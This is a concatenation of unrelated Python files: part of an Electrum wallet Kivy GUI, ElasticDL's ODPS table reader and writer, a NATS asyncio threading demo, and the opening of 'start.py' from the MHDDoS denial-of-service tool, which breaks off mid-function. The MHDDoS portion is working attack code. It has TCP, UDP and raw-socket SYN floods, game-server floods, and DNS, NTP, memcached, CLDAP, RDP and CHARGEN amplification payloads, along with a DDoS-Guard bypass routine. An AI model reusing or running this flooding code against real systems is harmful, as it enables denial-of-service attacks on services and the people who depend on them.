def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
odps_io.py
|
# Copyright 2020 The ElasticDL Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
from multiprocessing import Process, Queue
import odps
from odps import ODPS
from odps.models import Schema
from elasticdl.python.common.constants import MaxComputeConfig
from elasticdl.python.common.log_utils import default_logger as logger
def _nested_list_size(nested_list):
"""
Obtains the memory size for the nested list.
"""
total = sys.getsizeof(nested_list)
for i in nested_list:
if isinstance(i, list):
total += _nested_list_size(i)
else:
total += sys.getsizeof(i)
return total
def _configure_odps_options(endpoint, options=None):
if endpoint is not None and endpoint != "":
odps.options.retry_times = options.get("odps.options.retry_times", 5)
odps.options.read_timeout = options.get(
"odps.options.read_timeout", 200
)
odps.options.connect_timeout = options.get(
"odps.options.connect_timeout", 200
)
odps.options.tunnel.endpoint = options.get(
"odps.options.tunnel.endpoint", None
)
if (
odps.options.tunnel.endpoint is None
and "service.odps.aliyun-inc.com/api" in endpoint
):
odps.options.tunnel.endpoint = "http://dt.odps.aliyun-inc.com"
def is_odps_configured():
return all(
k in os.environ
for k in (
MaxComputeConfig.PROJECT_NAME,
MaxComputeConfig.ACCESS_ID,
MaxComputeConfig.ACCESS_KEY,
)
)
class ODPSReader(object):
def __init__(
self,
project,
access_id,
access_key,
endpoint,
table,
partition=None,
num_processes=None,
options=None,
transform_fn=None,
columns=None,
):
"""
Constructs a `ODPSReader` instance.
Args:
project: Name of the ODPS project.
access_id: ODPS user access ID.
access_key: ODPS user access key.
endpoint: ODPS cluster endpoint.
table: ODPS table name.
tunnel_endpoint: ODPS tunnel endpoint.
partition: ODPS table's partition.
options: Other options passed to ODPS context.
num_processes: Number of parallel processes on this worker.
If `None`, use the number of cores.
transform_fn: Customized transfrom function
columns: list of table column names
"""
super(ODPSReader, self).__init__()
if table.find(".") > 0:
project, table = table.split(".")
if options is None:
options = {}
self._project = project
self._access_id = access_id
self._access_key = access_key
self._endpoint = endpoint
self._table = table
self._partition = partition
self._num_processes = num_processes
_configure_odps_options(self._endpoint, options)
self._odps_table = ODPS(
self._access_id, self._access_key, self._project, self._endpoint,
).get_table(self._table)
self._transform_fn = transform_fn
self._columns = columns
def reset(self, shards, shard_size):
"""
The parallel reader launches multiple worker processes to read
records from an ODPS table and applies `transform_fn` to each record.
If `transform_fn` is not set, the transform stage will be skipped.
Worker process:
1. get a shard from index queue, the shard is a pair (start, count)
of the ODPS table
2. reads the records from the ODPS table
3. apply `transform_fn` to each record
4. put records to the result queue
Main process:
1. call `reset` to create a number of shards given a input shard
2. put shard to index queue of workers in round-robin way
3. call `get_records` to get transformed data from result queue
4. call `stop` to stop the workers
"""
self._result_queue = Queue()
self._index_queues = []
self._workers = []
self._shards = []
self._shard_idx = 0
self._worker_idx = 0
for i in range(self._num_processes):
index_queue = Queue()
self._index_queues.append(index_queue)
p = Process(target=self._worker_loop, args=(i,))
p.daemon = True
p.start()
self._workers.append(p)
self._create_shards(shards, shard_size)
for i in range(2 * self._num_processes):
self._put_index()
def get_shards_count(self):
return len(self._shards)
def get_records(self):
data = self._result_queue.get()
self._put_index()
return data
def stop(self):
for q in self._index_queues:
q.put((None, None))
def _worker_loop(self, worker_id):
while True:
index = self._index_queues[worker_id].get()
if index[0] is None and index[1] is None:
break
records = []
for record in self.record_generator_with_retry(
start=index[0],
end=index[0] + index[1],
columns=self._columns,
transform_fn=self._transform_fn,
):
records.append(record)
self._result_queue.put(records)
def _create_shards(self, shards, shard_size):
start = shards[0]
count = shards[1]
m = count // shard_size
n = count % shard_size
for i in range(m):
self._shards.append((start + i * shard_size, shard_size))
if n != 0:
self._shards.append((start + m * shard_size, n))
def _next_worker_id(self):
cur_id = self._worker_idx
self._worker_idx += 1
if self._worker_idx == self._num_processes:
self._worker_idx = 0
return cur_id
def _put_index(self):
# put index to the index queue of each worker
# with Round-Robin way
if self._shard_idx < len(self._shards):
worker_id = self._next_worker_id()
shard = self._shards[self._shard_idx]
self._index_queues[worker_id].put(shard)
self._shard_idx += 1
def read_batch(self, start, end, columns=None, max_retries=3):
"""
Read ODPS table in chosen row range [ `start`, `end` ) with the
specified columns `columns`.
Args:
start: The row index to start reading.
end: The row index to end reading.
columns: The list of column to read.
max_retries : The maximum number of retries in case of exceptions.
Returns:
Two-dimension python list with shape: (end - start, len(columns))
"""
retry_count = 0
if columns is None:
columns = self._odps_table.schema.names
while retry_count < max_retries:
try:
record_gen = self.record_generator(start, end, columns)
return [record for record in record_gen]
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} for {} in {}."
"Retrying time: {}".format(
e, columns, self._table, retry_count
)
)
time.sleep(5)
retry_count += 1
def record_generator_with_retry(
self, start, end, columns=None, max_retries=3, transform_fn=None
):
"""Wrap record_generator with retry to avoid ODPS table read failure
due to network instability.
"""
retry_count = 0
while retry_count < max_retries:
try:
for record in self.record_generator(start, end, columns):
if transform_fn:
record = transform_fn(record)
yield record
break
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} for {} in {}."
"Retrying time: {}".format(
e, columns, self._table, retry_count
)
)
time.sleep(5)
retry_count += 1
def record_generator(self, start, end, columns=None):
"""Generate records from an ODPS table
"""
if columns is None:
columns = self._odps_table.schema.names
with self._odps_table.open_reader(
partition=self._partition, reopen=False
) as reader:
for record in reader.read(
start=start, count=end - start, columns=columns
):
yield [str(record[column]) for column in columns]
def get_table_size(self, max_retries=3):
retry_count = 0
while retry_count < max_retries:
try:
with self._odps_table.open_reader(
partition=self._partition
) as reader:
return reader.count
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} to get table size."
"Retrying time: {}".format(e, retry_count)
)
time.sleep(5)
retry_count += 1
def _estimate_cache_batch_count(self, columns, table_size, batch_size):
"""
This function calculates the appropriate cache batch size
when we download from ODPS, if batch size is small, we will
repeatedly create http connection and download small chunk of
data. To read more efficiently, we will read
`batch_size * cache_batch_count` lines of data.
However, determining a proper `cache_batch_count` is non-trivial.
Our heuristic now is to set a per download upper bound.
"""
sample_size = 10
max_cache_batch_count = 50
upper_bound = 20 * 1000000
if table_size < sample_size:
return 1
batch = self.read_batch(start=0, end=sample_size, columns=columns)
size_sample = _nested_list_size(batch)
size_per_batch = size_sample * batch_size / sample_size
# `size_per_batch * cache_batch_count` will
# not exceed upper bound but will always greater than 0
cache_batch_count_estimate = max(int(upper_bound / size_per_batch), 1)
return min(cache_batch_count_estimate, max_cache_batch_count)
class ODPSWriter(object):
def __init__(
self,
project,
access_id,
access_key,
endpoint,
table,
columns=None,
column_types=None,
options=None,
):
"""
Constructs a `ODPSWriter` instance.
Args:
project: Name of the ODPS project.
access_id: ODPS user access ID.
access_key: ODPS user access key.
endpoint: ODPS cluster endpoint.
table: ODPS table name.
columns: The list of column names in the table,
which will be inferred if the table exits.
column_types" The list of column types in the table,
which will be inferred if the table exits.
options: Other options passed to ODPS context.
"""
super(ODPSWriter, self).__init__()
if table.find(".") > 0:
project, table = table.split(".")
if options is None:
options = {}
self._project = project
self._access_id = access_id
self._access_key = access_key
self._endpoint = endpoint
self._table = table
self._columns = columns
self._column_types = column_types
self._odps_table = None
_configure_odps_options(self._endpoint, options)
self._odps_client = ODPS(
self._access_id, self._access_key, self._project, self._endpoint
)
def _initialize_table(self):
if self._odps_client.exist_table(self._table, self._project):
self._odps_table = self._odps_client.get_table(
self._table, self._project
)
else:
if self._columns is None or self._column_types is None:
raise ValueError(
"columns and column_types need to be "
"specified for non-existing table."
)
schema = Schema.from_lists(
self._columns, self._column_types, ["worker"], ["string"]
)
self._odps_table = self._odps_client.create_table(
self._table, schema
)
def from_iterator(self, records_iter, worker_index):
if self._odps_table is None:
self._initialize_table()
with self._odps_table.open_writer(
partition="worker=" + str(worker_index), create_partition=True
) as writer:
for records in records_iter:
writer.write(records)
|
coroutine_threadsafe.py
|
import asyncio
import time
import logging
from threading import Thread
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout
class Component:
component = None
def __init__(self):
self.nc = NATS()
self.loop = asyncio.new_event_loop()
if not Component.component:
Component.component = Component.__Component(self.nc, self.loop)
def run(self):
self.loop.run_until_complete(Component.component.run())
# Without this the ping interval will fail
self.loop.run_forever()
def publish(self, subject, data):
# Required to be able to run the coroutine in the proper thread.
asyncio.run_coroutine_threadsafe(
Component.component.publish(subject,data),
loop=self.loop)
def request(self, subject, data):
# Required to be able to run the coroutine in the proper thread.
future = asyncio.run_coroutine_threadsafe(
Component.component.request(subject, data),
loop=self.loop)
return future.result()
class __Component:
def __init__(self, nc, loop):
self.nc = nc
self.loop = loop
async def publish(self, subject, data):
await self.nc.publish(subject, data)
async def request(self, subject, data):
msg = await self.nc.request(subject, data)
return msg
async def msg_handler(self, msg):
print(f"--- Received: {msg.subject} {msg.data} {msg.reply}")
await self.nc.publish(msg.reply, b'I can help!')
async def run(self):
# It is very likely that the demo server will see traffic from clients other than yours.
# To avoid this, start your own locally and modify the example to use it.
# await self.nc.connect(servers=["nats://127.0.0.1:4222"], loop=self.loop)
await self.nc.connect(servers=["nats://demo.nats.io:4222"], loop=self.loop)
await self.nc.subscribe("help", cb=self.msg_handler)
await self.nc.flush()
def another_thread(c):
for i in range(0, 5):
print("Publishing...")
c.publish("help", b'hello world')
time.sleep(1)
msg = c.request("help", b'hi!')
print(msg)
def go():
# Create component and have it connect.
component = Component()
# Start the component loop in its own thread.
thr1 = Thread(target=component.run)
thr1.start()
# Another thread that will try to publish events
thr2 = Thread(target=another_thread, args=(component,))
thr2.start()
thr2.join()
if __name__ == '__main__':
go()
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def exit(*message):
if message:
logger.error(bcolors.FAIL +" ".join(message) + bcolors.RESET)
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER", "KILLER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return str(ProxyTools.Tools.rand_char(lengh)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def dgb_solver(url, ua, pro=None):
s = None
idss = None
with Session() as s:
if pro:
s.proxies=pro
hdrs = {
"User-Agent": ua,
"Accept": "text/html",
"Accept-Language": "en-US",
"Connection": "keep-alive",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"TE": "trailers",
"DNT": "1"
}
with s.get(url, headers=hdrs) as ss:
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
hdrs = {
"User-Agent": ua,
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": url,
"Sec-Fetch-Dest": "script",
"Sec-Fetch-Mode": "no-cors",
"Sec-Fetch-Site": "cross-site"
}
with s.post("https://check.ddos-guard.net/check.js", headers=hdrs) as ss:
for key, value in ss.cookies.items():
if key == '__ddg2':
idss = value
s.cookies.set_cookie(cookies.create_cookie(key, value))
hdrs = {
"User-Agent": ua,
"Accept": "image/webp,*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Cache-Control": "no-cache",
"Referer": url,
"Sec-Fetch-Dest": "script",
"Sec-Fetch-Mode": "no-cors",
"Sec-Fetch-Site": "cross-site"
}
with s.get(f"{url}.well-known/ddos-guard/id/{idss}", headers=hdrs) as ss:
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
return s
return False
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(.9)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
